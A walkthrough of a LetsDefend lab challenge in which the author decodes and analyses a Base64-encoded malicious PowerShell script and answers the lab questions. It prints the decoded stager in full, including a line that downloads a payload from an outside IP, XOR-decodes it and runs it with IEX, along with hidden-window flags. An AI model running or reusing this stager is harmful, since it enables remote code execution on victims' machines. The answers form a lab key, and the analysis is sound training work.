Challenge Description
You’ve come across a puzzling Base64 script, seemingly laced with malicious intent. Your mission, should you choose to accept it, is to dissect and analyze this script, unveiling its true nature and potential risks. Dive into the code and reveal its secrets to safeguard our digital realm. Good luck on this daring quest!
Tool Needed: Cyberchef
File Location: C:\Users\LetsDefend\Desktop\script.txt
This challenge prepared by ZaadoOfc
Credit: csnp.org
Questions
What encoding is the malicious script using?
What parameter in the powershell script makes it so that the powershell window is hidden when executed?
What parameter in the Powershell script prevents the user from closing the process?
What line of code allows the script to interact with websites and retrieve information from them?
What is the user agent string that is being spoofed in the malicious script?
What line of code is used to set the proxy credentials for authentication in the script?
When the malicious script is executed, what is the URL that the script contacts to download the malicious payload?
When you click Lab Environment Connect button on LetsDefend we see a Windows 10 VM and in the desktop this is our PowerShell Script.
So let’s answer the questions
1 - What encoding is the malicious script using?
Answer: Base64
You can use CyberChef Magic Extension or different encoding identifiers to learn which encoding applied to a string
2- What parameter in the powershell script makes it so that the powershell window is hidden when executed?
Answer: -W Hidden
-W or -Windows Style is an argument for PowerShell. -W Hidden used for -Windows Style Hidden argument.
3- What parameter in the Powershell script prevents the user from closing the process?
Answer: -NonI
NonI parameter means Non Interactive, This parameter disables the ability for commands to attempt to prompt. So user can’t interrupt the process
After this step we should decode the string. You can do it with terminal or online tools. I preferred to use online decoders. After decoding string here I get the clear PowerShell Script
$WC=New-ObjEcT SySTeM.NET.WebCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeADeRS.ADd('User-Agent',$u);$Wc.ProxY = [System.NeT.WEBReQUEst]::DEFAuLtWebProXy;$wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls;$K='IM-S&fA9Xu{[)|wdWJhC+!N~vq_12Lty';$i=0;[CHaR[]]$B=([cHaR[]]($wc.DOwNLOaDStriNg("http://98.103.103.170:7443/index.asp")))|%{$_-BXoR$K[$I++%$k.LEnGTH]};IEX ($B-jOIn'')
4- What line of code allows the script to interact with websites and retrieve information from them?
Answer: $WC=New-Object System.Net.WebClient
WebClient class provides common methods for sending or receiving data from internet
5- What is the user agent string that is being spoofed in the malicious script?
Answer: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
The user agent string contains information that a web browser uses to identify itself to a server
6- What line of code is used to set the proxy credentials for authentication in the script?
Answer: $wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls
Sets the proxy credentials to the default network credentials.
7- When the malicious script is executed, what is the URL that the script contacts to download the malicious payload?
Answer: http://98.103.103.170:7443/index.asp
The URL in Web Client Download String Command. $wc.DOwNLOaDStriNg("http://98.103.103.170:7443/index.asp"